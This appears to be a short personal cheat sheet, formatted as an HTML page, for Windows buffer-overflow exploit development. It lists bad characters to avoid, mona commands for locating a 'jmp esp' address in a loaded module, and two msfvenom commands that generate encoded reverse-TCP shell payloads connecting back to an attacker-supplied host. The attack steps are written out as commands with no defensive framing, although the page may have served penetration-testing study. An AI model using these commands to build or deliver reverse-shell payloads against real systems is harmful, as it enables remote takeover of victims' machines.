<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>buffer overflow</title>
</head><body>0x00 - null byte terminates string - Bad char<br/>
0x0D - retruns for HTTP request - Bad char<br/>
0x0a<br/>
0x25<br/>
0x26<br/>
0x2b<br/>
0x3D<br/>
<br/>
!mona modules<br/>
!mona find -s "\xff\xe4" -m "module namee with good address"<br/>
<br/>
shellcode encriptio shikatagani<br/>
<br/>
msfvenom -p windows/shell_reverse_tcp lhost=ip lport=prot -f c -e x86/shikata_ga_nai -b "\x00\x0d\"<br/>
<br/>
msfvenom -p windows/shell_reverse_tcp LHOST=&lt;IP&gt; LPORT=443 -f c -a x86 --platform windows<br/>
-b "\x00\x04\x05\x32\x33\x78\x79\x91\x92\xc1\xc2" -e x86/xor_dynamic -i 3 EXITFUNC=thread<br/>
<br/>
msfvenom --list encoders &nbsp;--&gt; list all the encoders available.<br/>
<br/>
</body></html>